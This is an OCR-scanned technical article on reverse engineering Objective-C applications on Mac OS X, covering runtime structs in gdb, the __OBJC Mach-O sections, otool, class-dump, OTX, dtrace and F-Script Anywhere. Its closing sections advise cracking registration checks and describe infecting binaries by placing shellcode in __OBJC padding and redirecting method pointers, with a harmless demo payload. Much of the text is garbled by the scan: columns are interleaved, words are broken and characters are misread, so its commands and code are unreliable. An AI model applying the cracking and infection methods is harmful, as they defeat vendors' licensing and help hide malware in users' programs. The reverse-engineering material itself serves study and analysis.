struct objc_class 
{ 
struct objc_class* isa; 
struct objc_class* super_class; 
const char* name; 
long version; 
long info; 
long instance_size; 
struct objc_ivar_list* ivars; 
struct objc_method_list** methodLists; 
struct objc_cache* cache; 
struct objc_protocol_list* protocols; 


}; 


Our ivars pointer (24 bytes in to the objc_class struct) is required 
because of the reflective properties of the Objective-C language. The ivars 
pointer basically points to all the information about the instance 
variables of the class. 


We can explore this in gdb, with our Fraction class some more. 
First off, let’s put a breakpoint on one of our objc_msgSend calls: 


(gdb) break *0x00001f3b 
Breakpoint 2 at Ox1f3b 
(gdb) c 

Continuing. 


Once it’s hit, we use the stepi command a few times, to populate the 
registers eax and ecx with the selector and id. 


Breakpoint 2, 0x00001f3b in main () 
(gdb) stepi 

0x00004005 in dyld_stub_objc_msgSend () 
(gdb) 

0x94e0c670 in objc_msgSend () 

(gdb) 

0x94e0c674 in objc_msgSend () 


Now our eax register contains a pointer to our instantiated class. 


(gdb) x/x Seax 
0x103230: 0x00003000 


We display the first 4 bytes at eax to retrieve the ISA pointer. 


Then we dump a bunch of bytes at that address. 
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(gdb) x/10x 0x3000 


0x3000 <.objc_class_name_Fraction>: 0x00003040 Oxa06e3cc0 
0x00001f7e 0x00000000 

0x3010 <.objc_class_name_Fractiont+16>: 0Ox00ba4001 0x0000000c 
0x000030c4 0x00103240 

0x3020 <.objc_class_name_Fractiont+32>: 0x001048d0 0x00000000 
So according to our previous logic, 24 bytes in we should have the 
ivars pointer. Therefore in this case our ivars pointer is: 


0x000030c4 


Before we continue dumping memory here, lets take a look at the struct 
definitions for what we’re seeing. 


The pointer we just found, points to a struct of type "objc_ivar_list" 
this struct looks like so: 


struct objc_ivar_list { 
int ivar_count 
/* variable length structure */ 
struct objc_ivar ivar_list[1] 


} 


So we can dump the count, trivially in gdb. 


(gdb) x/x 0x000030c4 
Ox30c4 <.objc_class_name_Fractiont+196>: 0x00000002 


And see that our Fraction class has 2 ivars. This makes sense, numerator 
and denominator. 


Following our count is an array of objc_ivar structs, one for each instance 
variable of the class. The definition for this struct is as follows: 


struct objc_ivar { 
char *ivar_name 
char *ivar_type 
int ivar_offset 


} 


So lets start dumping our ivars and see where it takes us. 


(gdb) 

0x30c8 <.objc_class_name_Fraction+200>: O0x00001fb7 // ivar_name. 
(gdb) 
Ox30cc <.objc_class_name_Fraction+204>: 0x00001fd9 // ivar_type. 
(gdb) 
0x30d0 <.objc_class_name_Fraction+208>: 0x00000004 // ivar_offset. 


So if we dump the name and type, we can see that the first instance 
variable we are looking at is the numerator. 


(gdb) x/s 0x00001fb7 


Oxlfb7 <main+286>: "numerator" 
(gdb) x/s 0x00001fd9 
Oxlfd9 <maint+320>: na 


The "i" in the type string means that we’re looking at an integer. 

The int ivar_offset is set to 0x4. This means that when a Fraction class 
is allocated, 4 bytes into the allocation we can find the numerator. This 
matches up with the code in our setNumerator and makes sense. 


We can repeat the process with the next element to verify our logic. 


(gdb) 
Ox30d4 <.objc_class_name_Fraction+212>: 0x00001fab 
(gdb) 
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0x30d8 <.objc_cl 


(gdb) 


Ox30dc <.objc_cl 


(gdb) x/s 
Oxlfab <ma 
(gdb) x/s 
Oxlfd9 <ma 


Again, as 
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Lass_name 


Lass_name 


0x00001fab 
int274>: 
0x00001fd9 
int+320>: 


we can See, 


Fraction+216>: 


Fractiont+220>: 


"denominator" 


into the allocation for this object. 


Hopefully that makes the Objectiv 


3.2 - The __OBJC Segment 


18 
0x00001fd9 


0x00000008 


the denominator is an integer and is 0x8 bytes offset 


C runtime in memory relatively clear. 


In this section I will go over how the data mentioned in the previous 
section is stored inside the Mach-O binary. 


I’m going to try and avoid going into the Mach-O format as much as 


possible. 


the file format check out 


Basically, 


called the __OBJC segment. 


sections, 
Objective- 


This has already b 


[6]. 


n covered to death, 


if you need to read about 


files containing Objectiv 


C code have an 
This segment consists of a bunch of different 


xtra Mach-O segment 


each containing different information pertinent to the 


C runtime. 


The output below from the otool -l command shows the sizes/load addresses 
and flags etc for our __OBJC sections in the hello binary we compiled 


earlier in 


the paper. 


—[dcbz@megatron: ~/code/HelloWorld/build]$ otool -1 hello 


Load comma 
cmd 
cmdsize 
segname 
vmaddr 
vmsize 
fileoff 
filesize 
maxprot 
initprot 
nsects 
flags 
Section 
sectname 
segname 
addr 
size 
offset 
align 
reloff 
nreloc 
flags 
reservedl 
reserved2 
Section 
sectname 
segname 
addr 
size 
offset 
align 
reloff 


nd 3 
LC_SEGMENT 
668 


= OBIGC 


0x00003000 
0x00001000 
8192 

4096 
0x00000007 
0x00000003 
9 

0x0 


__class 
___OBJC 
0x00003000 
0x00000030 
8192 
2°) 
0 

0 
0x00000000 
0 

0 


(32) 


meta_class 


___OBJC 
0x00003040 
0x00000030 
8256 
225 
0 


(32) 
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nreloc 
flags 
reservedl 
reserved2 
Section 
sectname 
segname 
addr 
size 
offset 
align 
reloff 
nreloc 
flags 
reservedl 
reserved2 
Section 
sectname 
segname 
addr 
size 
offset 
align 
reloff 
nreloc 
flags 
reservedl 
reserved2 
Section 
sectname 
segname 
addr 
size 
offset 
align 
reloff 
nreloc 
flags 
reservedl 
reserved2 
Section 
sectname 
segname 
addr 
size 
offset 
align 
reloff 
nreloc 
flags 
reservedl 
reserved2 
Section 
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0) 
0x00000000 
0) 
0) 


__inst_meth 
__OBJC 
0x00003080 
0x00000020 
8320 

229: (32) 

0 

0 
0x00000000 
0 

0 


__instance_vars 
___OBJC 
0x000030a0 
0x00000010 
8352 

2°2 (4) 

0 

0 
0x00000000 
0 

0 


__module_info 
___OBJC 
0x000030b0 
0x00000020 
8368 

2°2 (4) 

0 

0 
0x00000000 
0 

0 


__ symbols 
__OBJC 
0x000030d0 
0x00000010 
8400 

2*°2 (4) 

0 

0 
0x00000000 
0 

0 


sectnam 
segname 
addr 
size 
offset 
align 
reloff 
nreloc 
flags 
reservedl 
reserved2 

Section 

sectname 
segname 
addr 


__message_refs 
__OBJC 
0x000030e0 
0x00000010 
8416 

2°2 (4) 

0 

0 
0x00000005 
0 

0 


__cls_refs 
__OBJC 
0x000030f0 
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size 0x00000004 
offset 8432 
align 2%2 (4) 
reloff 0 
nreloc 0 
flags 0x00000000 
reservedl 0 
reserved2 0 
Section 
sectname __image_info 
segname __OBJC 
addr 0x000030f4 
size 0x00000008 
offset 8436 
align 2%2 (4) 
reloff 0 
nreloc 0 
flags 0x00000000 
reservedl 0 
reserved2 0 


This output shows us where in the file itself each section resides. It also 


shows us where that portion will be mapped into memory in the address space 
of the process, as well as the size of each mapping. 


The first section in the __OBJC segment we will look at is the __class 
section. To understand this we’ll take a quick look at how ida displays thi 
section. 


Ss 


__class:00003000 ; 
__class:00003000 
__class:00003000 ; Segment type: Pure data 
__class:00003000 ; Segment alignment ’32byte’ can not be represented in assembly 
__class:00003000 __class segment para public ’DATA’ use32 
__class:00003000 assume cs:__class 
__class:00003000 7;org 3000h 
__class:00003000 public _objc_class_name_Talker 
__class:00003000 _objc_class_name_Talker __class_struct <offset stru_3040, offset aNsobject 
, offset aTalker, 0,\ 
__class:00003000 ; DATA XREF: __symbols:000030BO0o 
__class:00003000 1, 4, 0, offset dword_3070, 0, O> ; "NSObj 
ect." 
__class:00003028 align 10h 
__class:00003028 __class ends 
class:00003028 


From IDA’s dump of this section (from our hello binary) we can see that 
this section is pretty much where our objc_class structs are stored. 


struct objc_class 
{ 
struct objc_class* isa; 
struct objc_class* super_class; 
const char* name; 
long version; 
Long aLnLoy 
long instance_size; 
struct objc_ivar_list* ivars; 
struct objc_method_list** methodLists; 
struct objc_cache* cache; 
struct objc_protocol_list* protocols; 


}; 


More particularly though, this is where the ISA classes are stored. 

An interesting note, is that from what I’ve seen gcc seems to almost always 
pick 0x3000 for this section. It’s pretty reliable to attempt to utilize 
this area in an exploit if the need arises. 
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The next section we’ll look at is the __meta_class section. 


__meta_class:00003040 ; 
__meta_class:00003040 
__meta_class:00003040 ; Segment type: Pure data 
__meta_class:00003040 ; Segment alignment ’32byte’ can not be represented in assembly 
__meta_class:00003040 __meta_class segment para public ’DATA’ use32 
__meta_class:00003040 assume cs:__meta_class 
__meta_class:00003040 ;org 3040h 
__meta_class:00003040 stru_3040 __class_struct <offset aNsobject, offset aNsobject, o 
ffset aTalker, 0,\ 
__meta_class:00003040 ; DATA XREF: __class:_objc_cl 
ass_name_Talker\0300 
__meta_class:00003040 2, 30h, 0, 0, 0, O> ; “NSObject" 
__meta_class:00003068 align 10h 
__meta_class:00003068 __ meta_class ends 

meta_class:00003068 


Again, as you can see this section is filled with objc_class structs. 
However this time the structs represent the super_class structs. We can see 
that the __class section references this one. 


The __inst_meth section (shown below) contains pointers to the various 


methods used by the classes. These pointers can be changed to gain control 

of execution. 

__inst_meth:00003070 ; 

__inst_meth:00003070 

__inst_meth:00003070 ; Segment type: Pure data 

__inst_meth:00003070 __inst_meth segment dword public ’DATA’ use32 

__inst_meth:00003070 assume cs:__inst_meth 

__inst_meth:00003070 ;org 3070h 

__inst_meth:00003070 dword_3070 dd 0 ; DATA XREF: __class:_objc_cla 

ss_name_Talker\0300 

__inst_meth:00003074 dd 1 

__inst_meth:00003078 dd offset aSay, offset av12@048, offset __Talker_say__ 
F "Say:" 

__inst_meth:00003078 __inst_meth ends 

__inst_meth:00003078 

The __message_refs section basically just contains pointers to all the 


selectors used throughout the application. 
contained in the __cstring section, 
pointers to them. 


The strings themselves are 
however __message_refs contains all the 


__message_refs:000030B4 ; 

__message_refs:000030B4 

__message_refs:000030B4 ; Segment type: Pure data 

__message_refs:000030B4 _message_refs segment dword public ’DATA’ use32 
__message_refs:000030B4 assume cs:__message_refs 

__message_refs:000030B4 ;org 30B4h 

__message_refs:000030B4 off_30B4 dd offset aRelease ; DATA XREF: _main+68\0300 
__message_refs:000030B4 ; “release" 
__message_refs:000030B8 off_30B8 dd offset aSay ; DATA XREF: _maint47\0300 
__message_refs:000030B8 ; “say:" 
__message_refs:000030BC off_30BC dd offset aInit ; DATA XREF: _main+2D\0300 
__message_refs:000030BC eae 
__message_refs:000030C0 off_30C0 dd offset aAlloc ; DATA XREF: _maint+17\0300 
__message_refs:000030C0 __message_refs nds ; "alloc" 
__message_refs:000030C0 

The __cls_refs section contains pointers to the names of all the classes in 

our Application. The strings themselves again are stored in the cstring 


Sec 


tion; 


however the __cls_refs section simply contains an array of 


4.txt Wed Apr 26 09:43:46 2017 22 


pointers to each of them. 


__cls_refs:000030C4 ; 

__cls_refs:000030C4 

__cls_refs:000030C4 ; Segment type: Regular 

__cls_refs:000030C4 __cls_refs segment dword public ’’ use32 

__cls_refs:000030C4 assume cs:__cls_refs 

__cls_refs:000030C4 ;org 30C4h 

__cls_refs:000030C4 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, 
gs:nothing 

__cls_refs:000030C4 unk_30C4 db O0C9h ; + ; DATA XREF: _main+D\0300 
__cls_refs:000030C5 db 1Fh 

__cls_refs:000030C6 db 0 

__cls_refs:000030C7 db 0 

__cls_refs:000030C7 __cls_refs ends 

__cls_refs:000030C7 

I’m not really sure what the __image_info section is used for. But it’s 


good for us to use in our binary infector. :P 


__image_info:000030C8 ; 

image_info:000030C8 
__image_info:000030C8 ; Segment type: Regular 
__image_info:000030C8 __image_info segment dword public ’’ use32 
__image_info:000030C8 assume cs:__image_info 
__image_info:000030C8 ;org 30C8h 
__image_info:000030C8 assume es:nothing, ss:nothing, ds:nothing, fs:nothing 
, gsi:nothing 
__image_info:000030C8 align 10h 
__image_info:000030C8 __image_info ends 

image_info:000030C8 


One section that was missing from our hello binary but is typically in all 


Objective-C compiled files is the instance_vars section. 
Section 
sectname instance_vars 


segname __OBJC 
addr 0x000030c4 
size 0x0000001c 
offset 8388 
align 2%2 (4) 
reloff 0 
nreloc 0 
flags 0x00000000 
reservedl 0 
reserved2 0 


The reason this was omitted from our hello binary is due to the fact that 
our program has no classes with instance vars. Talker simply had a method 
which took a string and printed it. 


The __instance_vars section holds the ivars structs mentioned at the end of 
the previous chapter. It begins with a count, and is followed up by an 
array of objc_ivar structs, as described previously. 


struct objc_ivar { 
char *ivar_name 
char *ivar_type 
int ivar_offset 


} 


I skipped a few of the self explanatory sections like symbols. But 
hopefully this served as an introduction to the information available to us 
in the binary. In the next sections we’1ll look at tools to turn this 
information into something more human readable. 
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[ 4 Reverse Engineering Objective-C Applications. 


As I’m sure you can imagine having read this far, with such a large variety 
of information present in the binary and in memory at runtime reverse 
engineering Objective-C applications is quite a bit easier than their C or 
C++ counterparts. 


In the following section I will run through some of the tools and methods 
that help out when attempting to revers ngineer Objective-C applications 
on Mac OSX both on disk and at runtime. 


—----- [ 4.1 - Static analysis toolset 


First up, lets take a look at how we can access the information statically 
from the disk. There exists a variety of tools which help us with this 
task. 


The first tool, is one we’ve used previously in this paper, "otool". 
Otool on Mac OS X is basically the equivalent of objdump on other 
platforms (NOTE: objdump can obviously be compiled for Mac OS X too.). 
Otool will not only dump assembly code for particular sections as well as 
header information for Mach-O files, but it can display our Objective-C 


information as well. 


By using the "-o" flag to otool we can tell it to dump the Objective-C 
segment in a readable fashion. The output below shows us running this 
command against our hello binary from earlier. 


—[dcbz@megatron: ~/code/HelloWorld/build]$ otool -o hello 
hello: 
Objective-C segment 
Module 0x30b0 
version 7 
size 16 
name 0x00001fa8 
symtab 0x000030d0 
sel_ref_cnt 0 
refs 0x00000000 (not in an __OBJC section) 
cls_def_cnt 1 
cat_def_cnt 0 
Class Definitions 
defs[0] 0x00003000 
isa 0x00003040 
super_class 0x00001fa9 
name 0x00001fb2 
version 0x00000000 
info 0x00000001 
instance_size 0x00000008 
ivars 0x000030a0 
ivar_count 1 
ivar_name 0x00001fc6 
ivar_type 0x00001fde 
ivar_offset 0x00000004 
methods 0x00003080 
obsolete 0x00000000 
method_count 2 
method_name 0x00001fcl 
method_types 0x00001fd4 
method_imp 0x00001f13 
method_name 0x00001fb9 
method_types 0x00001fca 
method_imp 0x00001f02 
cache 0x00000000 
protocols 0x00000000 (not in an __OBJC section) 
Meta Class 


isa 0x00001fa9 
super_class 0x00001fa9 
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name O0x00001fb2 
version 0x00000000 
info 0x00000002 
instance_size 0x00000030 
ivars 0x00000000 (not in an __OBJC section) 
methods 0x00000000 (not in an __OBJC section) 
cache 0x00000000 
protocols 0x00000000 (not in an __OBJC section) 
Module 0x30c0 
version 7 
size 16 
name 0x00001fa8 
symtab 0x00002034 (not in an __OBJC section) 
Contents of (__OBJC, image_info) section 


version 0 
flags 0x0 RR 


As you can see, this output provides us with a variety of information such 
as the addresses of our class definitions, their ivar count, name and types 
as well as their offsets into the appropriate section. 


Most of the times however, it can be more useful to see a human readable interfac 


description for our binary. 
available from [14]. 


This can be arranged using the class-dump tool 


-[dcbz@megatron:~,/code/HelloWorld/build]$ 
/Volumes/class-—dump-3.1.2/class-—dump hello 


/* 
* Generated by class-dump 3.1.2. 
* 
* class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2007 by Steve 
ss Nygard. 
aa 
/* 
* File: hello 
* Arch: Intel 80x86 (i386) 
*/ 
@interface Talker NSObject 


{ 
} 


-— (void) say: (char *) fp8; 
@end 
The output above shows class-dump being run against our small hello binary 


from the previous sections. Our example is pretty tiny though, but it still 
demonstrates the format in which class-dump will display it’s information. 


By running this tool against Safari we can get a more clear picture of the 
kind of information class-dump can give us. 


/* 
= Generated by class-dump 3.1.2. 
class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2007 by Steve 
n Nygard. 
*/ 


struct AliasRecord; 


struct CGAffineTransform { 
float a; 

float b; 

float c; 

float d; 
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loat tx; 
loat ty; 


}; 

struct CGColor; 
struct CGImage; 
struct CGPoint { 


float x; 
float y; 


}; 


@protocol NSDraggingInfo 
(id) draggingDestinationWindow; 


struct _NSPoint) draggingLocation; 


id) draggedImage; 

id) draggingPasteboard; 

id) draggingSource; 

int) draggingSequenceNumber; 


( 
( 
( 
( 
( 
( 
( 
( 


@end 


Class-dump is a very valuable tool and definitely on 


that I run when trying to understand 
Back when the earth was flat, 


Code-dump was 
dumping class definitions, 
Unfortunately 
idea is still 
support added 
reliable output with that. 


very sound. 


void) slideDraggedImageTo: (struct _ 
(id) namesOfPromisedFilesDroppedAtDestination: (id) fp8; 


code-dump has never been updated since then, 
It would be really cool to s 
to Hex-rays in the future. 
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unsigned int) draggingSourceOperationMask; 


struct _NSPoint) draggedImageLocation; 


NSPoint) fp8; 


of the first things 
the purpose of an Objective-C binary. 


and Mac OS X ran mostly on PowerPC 
architecture Braden started work on a really cool 


tool called "code-dump". 


built on top of the class-dump source and rather than just 
it was designed to decompil 


le Objective-C cod 
but to me the 
some Objective-C 


I think you could get some really 


However, 
decompiler for intel Objectiv 
called OTX.app. OTX 
gui tool 


until the day arrives when someon 
C binaries the closest thing we 
(hosted on one of the coolest domains ever. 
l for Mac OS X which takes a Mach-O binary as input and 
otool output to dump an assembly listing. 


a real 

have is 

) [15] is a 
then uses 
It is capable of querying the 


bothers working on 


Objective-C sections of the binary for information and then populating the 


assembly with comments. 


Let’s take a look at the output from 
browser. 


OTX running against the Safari web 


—(id) [AppController(FileInternal) _closeMenuItem] 

+0 O00003f£70 55 pushl %Sebp 

+1 OO0003f71 89e5 movl %esp, sebp 

+3 00003£73 83ecl18 subl $0x18,%esp 

+6 O00003f76 alcc6cle00 movl Ox00le6ccc, eax _fileMenu 

+11 O0003f£7b 89442404 movl %eax,0x04 (Sesp) 

+15 OOO003£7£E 8b4508 movl 0x08 (%Sebp) , eax 

+18 OO0003f82 890424 movl %eax, (Sesp) 

+21 O0003f85 e812ee2000 calll 0x00212d9c -[(%esp,1) _fileMenu] 
+26 OO0003f8a 8b15bc6cl1le00 movl Ox00le6chc, tedx performClose: 
+32 00003f90 c744240800000000 movl $0x00000000, 0x08 (%esp) 

+40 O0003f98 8954240c movl %edx,0x0c (%esp) 

+44 OQ0003f9c 8b15c46c1e00 movl O0x00le6cc4, Sedx 


itemWithTarget:andAction: 
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+50 O0003fa2 890424 movl %eax, (Sesp) 
+53 O0003fa5 89542404 movl %edx,0x04 (%Sesp) 
+57 O0003fa9 e8eeed2000 calll 0x00212d9c 
-[(%esp,1) itemWithTarget:andAction: ] 
+62 O0003fae c9 leave 
+63 O0003faf c3 ret 
The comments in the above output are pretty clear, they show the name of 


the method as well as which method and attribute are being used in the 
assembly. 


Unfortunately, working from a .txt file containing assembly is still pretty 
painful, these days most people are using IDA pro to navigate an assembly 
listing. Back when I was first doing this research I wrote an ida python 
script which would parse the .txt file output from OTX, and steal all the 
comments, then add them to IDA. It also took the method names and renamed 
the functions appropriately and added cross refs where appropriate. 


Unfortunately I haven’t been able to locate this script since I got back 
from my forced time off :( If I do find it, I’11 put it up on felinemenace 
in case anyone is interested. Thankfully since I’ve been away it seems a 
few people have recreated IDC scripts to pull information from the __OBJC 
segment and populate the IDB. 


I’m sure you can google around and find them yourselves, but regardless a 
couple are available at [16] and [17]. 


ences [ 4.2 - Runtime analysis toolset 


In the previous section we explored how to access the Objective-C 
information present in the binary without executing it. In this section I 
will cover how to interact with the Objective-C runtime in the active 
process in order to understand program flow and assist in reverse 
engineering. 


The first tool we’1ll look at exists basically in the libobjc.A.dylib 
library itself. By setting the OBJC_HELP environment variable to anything 
non-zero and then running an Objective-C application we can see some 
options that are available to us. 


% OBJC_HELP=1 ./build/Debug/HelloWorld 

objc: OBJC_HELP: describe Objective-C runtime environment variables 

objc: OBJC_PRINT_OPTIONS: list which options are set 

objc: OBJC_PRINT_IMAGES: log image and library names as the runtime loads 
them 

objc: OBJC_PRINT_CONNECTION: log progress of class and category connections 
objc: OBJC_PRINT_LOAD_METHODS: log class and category +load methods as they 
are called 

objc: OBJC_PRINT_RTP: log initialization of the Objective-C runtime pages 
objc: OBJC_PRINT_GC: log some GC operations 

objc: OBJC_PRINT_SHARING: log cross-process memory sharing 

objc: OBJC_PRINT_CXX_CTORS: log calls to Ct+ ctors and dtors for instance 
variables 

objc: OBJC_DEBUG_UNLOAD: warn about poorly-behaving bundles when unloaded 
objc: OBJC_DEBUG_FRAGILE_SUPERCLASSES: warn about subclasses that may have 
been broken by subsequent changes to superclasses 

objc: OBJC_USE_INTERNAL_ZONE: allocate runtime data in a dedicated malloc 
zone 

objc: OBJC_ALLOW_INTERPOSING: allow function interposing of objc_msgSend() 
objc: OBJC_FORCE_GC: force GC ON, even if the executable wants it off 

objc: OBJC_FORCE_NO_GC: force GC OFF, even if the executable wants it on 
objc: OBJC_CHECK_FINALIZERS: warn about classes that implement -dealloc but 


not -finalize 
2006-04-22 12:08:17.544 HelloWorld[4831] Hello, World! 


This help is pretty self explanatory, in order to utilize each of this 
functionality you simply set the appropriate environment variable before 
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running your Objective-C application. The runtime does the rest. 


Another environment variable which is useful for runtime analysis of 
Objective-C applications is "NSObjCMessageLoggingEnabled". If this variable 
is set to "Yes" then all objc_msgSend calls are logged to a file 
/tmp/msgSends-<pid>. This is also obeyed for suid Objective-C apps and very 
useful. 


The output below demonstrates the use of this variable to log objc_msgSend 
calls for our "HelloWorld" application. 


-[dcbz@megatron:~,/code/HelloWorld/build]$ 
NSObjCMessageLoggingEnabled=Yes ./hello 
Hello World! 
—[dcbz@megatron:~/code/HelloWorld/build]$ cat /tmp/msgSends-—6686 
+ NSRecursiveLock NSObject initialize 

+ NSRecursiveLock NSObject new 

+ NSRecursiveLock NSObject alloc 


alker NSObject initialize 
alker NSObject alloc 
alker NSObject allocWithZone: 
- Talker NSObject init 
a 
a 
a 


lker Talker say: 
lker NSObject release 
lker NSObject dealloc 


From this output it is easy to see exactly what our application was doing when 
we ran it. 


To take our message tracing functionality further, the "dtrace" application 
can be used to spy on Objective-C methods and functionality. Taken straight 
from the dtrace man-page, dtrace supports an Objective-C provider. The 
syntax for this is as follows: 


ww 


OBJECTIVE C PROVIDER 
The Objective C provider is similar to the pid 
provider, and allows instrumentation of Objective C classes and 
methods. Objective C probe specifiers use the following format: 


objcpid: [class-name[ (category-name) ]]:[[+]|-]method-name] : [name] 
pid The id number of the process. 


class-—name 
The name of the Objective C class. 


category-name 
The name of the category within the Objective C class. 


method-name 
The name of the Objective C method. 


name The name of the probe, entry, return, or an 
integer instruction offset within the method. 


OBJECTIVE C PROVIDER EXAMPLES 
objc1l23:NSString:-*:entry 
Every instance method of class NSString in process 123. 


objcl23:NSString(*)::entry 
Every method on every category of class NSString in process 
123% 


objcl23:NSString (foo) :+*:entry 
Every class method in NSString’s foo category in process 123. 
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objc123::-*:sentry 
Every instance method in every class and category in process 


objcl123:NSString (foo) 
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V23 


:-dealloc:entry 


The dealloc method in the foo category of class NSString in 
process 123. 


objcl123::method?with?many?colons:entry 
The method method:with:many:colons in every class in 


ww 


process 123. 


characters inside of Objective C method names, 
otherwis 


This can be used as a message tracer for a particul 


use this to write a simpl 


interwebz regarding writing .d scripts, and honest] 
it, so I’m going to leave this topic for now. 


I’d imagine that most peop] 
with gdb. On Mac OS X, Appl 


support for Objectiv 


The first notable change I can think of is that they’v 


print-object command: 


(gdb) help print-object 
Ask an Objectiv 


In order to show an examp] 
Objective-C application... 


-[dcbz@megatron:~/code/Hel 
GNU gdb 6.3.50-20050815 


LYr 


lar class. 
fuzzer. There are plenty of tutorial 


(A ? wildcard must be used to match colon 


as they would 


be parsed as the provider field separators.) 


You can even 


ls out on the 


I’m still 


l very new to 


le reading this paper are already pretty familiar 
le have slightly modified gdb to have better 
C objects. 


C object to print itself. 


(Apple version gdb-768) 


(gdb) set disassembly-flavor intel 
(gdb) disas m 


Dump of 
0x00001 
0x00001 
0x00001 
[esac 
0x00001 
0x00001 
0x00001 
0x00001 
0x00001 
Leases 
0x00001 
0x00001 
0x00001 
0x00001 


assem 
E3d <m 
F3e <m 
F40 <m 


£96 <m 
F9a <m 
£F9d <m 
fa2 <m 
fad5 <m 


fbo9 <m 
foc <m 
fod <m 
fhe <m 


ai 


n 


bler code for function main: 
t+O>: 
t1>: 
P3S 


ai 
ai 
ai 


ai 
ai 
ai 
ai 
ai 


ai 
ai 
ai 
ai 


n+ 
n+ 
n4 


+89>: 
t+93>: 
t+96>: 


101>: 
104>: 


124>: 
127>: 
128>: 
129>: 
End of assembler dump. 


loWorld/build]$ gdb hello 


added th 


push ebp 

mov ebp,esp 

push ebx 

mov DWORD PTR [espt+0x4],edx 
mov DWORD PTR [esp],ecx 
call 0x4005 <dyld_stub_objc_msgSend> 
mov edx,DWORD PTR [ebp-Oxc] 
lea ax, [ebx+0x116b] 

add esp, 0x24 

pop ebx 

leave 

ret 


le of this we can fire up gdb on our hello example 


and stick a breakpoint on one of the calls to objc_msgSend() from 


main(). 


(gdb) b 


Breakpoint 1 at Ox1f9d 


(gdb) xr 


*0x00001f9d 


Starting program: 


Breakpo 
(gdb) s 


int 1, 
tepi 


/Users/dcbz/code/HelloWorld/build/hello 


Ox00001£9d in main () 


0x00004005 in dyld_stub_objc_msgSend () 


(gdb) 


0x94e0c670 in objc_msgSend () 


(gdb) 
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0x94e0c674 in objc_msgSend () 
(gdb) 
0x94e0c678 in objc_msgSend () 


We stepi a few instructions to populate our eax and ecx registers with the 
selector and id, as we’ve done previously in this paper. 


(gdb) po Seax 
<Talker: 0x103240> 


Then use the "po" command on our class pointer, which shows that we have an 
instance of the Talker class at 0x103240 on the heap. 


(gdb) x/x Seax 

0x103240: 0x00003000 
(gdb) po 0x3000 

Talker 


As you can see, if you use the "po" command on an ISA pointer, it simply 
spits out the name of the class. 


Some of the coolest techniques I’ve seen for manipulating the Objective-C 
runtime involve injecting an interpreter for the language of your choice 
into the address space of the running process, and then manipulating the 
classes in memory from there. None of the implementations of this that I’ve 
seen have been anywhere near as cool as F-Script Anywhere [18]. 


It’s hard to explain this tool in .txt format but if you have a Mac you 
should grab it and check it out. Basically when you run F-Script Anywhere 
you are presented with a list of all the running Objective-C applications 
on the system. You can select one and click the install button, to inject 
the F-Script interpreter into that process. 


On Leopard however, before you use this tool, you must set it to sgid 
procmod. This is due to the debugging restrictions around task_for_pid(). 
To do this basically just: 


—[root@megatron:/Applications/F-Script Anywhere.app/Contents/MacOS]$ 
chgrp procmod F-Script\ Anywhere 
—[root@megatron:/Applications/F-Script Anywhere.app/Contents/MacOS]$ 
chmod g+s F-Script\ Anywhere 


Once the F-Script interpreter has been injected into your application, a 
"FSA" menu will appear in the menu bar at the top of your screen. This menu 
gives you the options: 


— New F-Script Workspace. 
— Browser for target. 


If you select "New F-Script Workspace" you are presented with a small 
terminal, in which to execute F-Script commands. The F-Script language is 
very simple and documented on their website [18]. It looks very similar to 


Objective-C itself. The interpreter window is running in the context of the 
application itself. Therefore any F-Script statements you make are capable 
of manipulating the classes etc within the target Objective-C application. 


But what if you don’t know the name of your class in order to write 
F-Script to manipulate it? The "Browser" button at the bottom of the 
terminal will open up an object browser for our target application. 
Clicking on the "Classes" button at the top of this window will result ina 
list of all the classes in our address space being listed down the side. 
Clicking on any of the classes, will bring up all the attributes and 
methods for a particular class. (Methods are indicated with a colon. ie; 
"Ssay:"). Double clicking on any of the methods in this window will result 
in the method being called, if arguments are required a window will pop up 
prompting you to supply them. This is very useful for exploring and testing 
the functionality of your target. 


4.txt Wed Apr 26 09:43:46 2017 30 


Rather than clicking the "New F-Script Workspace" option in our FSA menu, 
you can select the "Browser for target" option. This will change your 
cursor into some kind of weird, clover/target/thing. Once this happens, 
clicking on any object in the gui, will pop up an object browser for the 
particular instance of the object. This way we can call methods/view 
attributes/s the address for the class etc. 


You can do a lot more with F-Script anywhere, but the best place to learn 
is from the website [18] itself. 


Sane [ 4.3 - Cracking 
I’m not going to spend too much time on this topic as it’s been covered 


pretty well by curious in [19], and I’ve published a little bit on it 
before in [13]. 


However, when attempting to crack Objective-C apps it’s always definitely 
worth running class-dump before you do anything else, and reading over the 
output. I can’t count the number of times I’ve seen an application which 
has a method like createRegistrationKey() which you can call from F-Script 
Anywhere, or isRegistered() which is easily noppable. With all the 
Objective-C information at your disposal cracking a majority of 
applications on Mac OS X becomes quite trivial. 


Honestly, lets face it, people writing applications for Mac OS X care about the 
pretty gui, not the binary protection schemes available. 


S=SSe= 4.4 -—- Objective-C Binary Infection 


Again I won’t spend too much time on this section. Dino let me know 
recently that Vincenzo Iozzo (snagg@openssl.it) did a talk apparently at 
Deepsec last year on infecting the Objective-C structures in a Mach-O 
binary. I couldn’t find any information on it on google, so i’ll release my 
technique, however if you want to read a (probably much much better 
technique) then look up Vincenzo’s work. 


The method I propose is quite simple, it involves looking at the __OBJC 

segment for any sections with padding, then writing our shellcode into each 
of them. Then basically overwriting a methods pointer with the address of 
t 
fe) 


he start of our shellcode. When the shellcode finishes executing, the 
riginal address is called. 


While this method is more complicated/convoluted than other Mach-O 
infection techniques, no attempt to modify the entry point takes place. 
his makes it harder to detect for the uninitiated. 
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In order to demonstrate this procedure I wrote the following tiny assembly 
code. 


-—[dcbz@megatron:~/code]$ cat infected.asm 


BITS 32 
SECTION .text 
_main: 
xor eax, eax 
push byte Oxa 
jmp short down 
up: 
push eax 
mov al, 0x04 
push eax ; fake 
int 0x80 
jmp short end 
down: 
call up 
db "infected!",0x0a, 0x00 
end: 


int3 
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-—[dcbz@megatron:”~/code]$ cat tst.c 

char sc[] = 
"\x31\xc0\x6a\x0a\xeb\x08\x50\xb0\x04\x50\xcd\x80\xeb\x10\xe8\xf3" 
"\xff\xff\xf£\x69\x6e\x66\x65\x63\x74\x65\x64\x21\x0a\x00\xcc"; 


int main(int ac, char **av) 
{ 
void (*fp) () = sc; 
fp(); 
} 
—[dcbz@megatron:”~/code]$ gcc tst.c -o tst 
tst.c: In function ‘main’: 
tst.c:7: warning: initialization from incompatible pointer type 
-[dcbz@megatron:~/code]$ ./tst 
infected! 
Trace/BPT trap 


As you can s when executed this code simply prints the string 
"infected!\n" using the write() system call. 


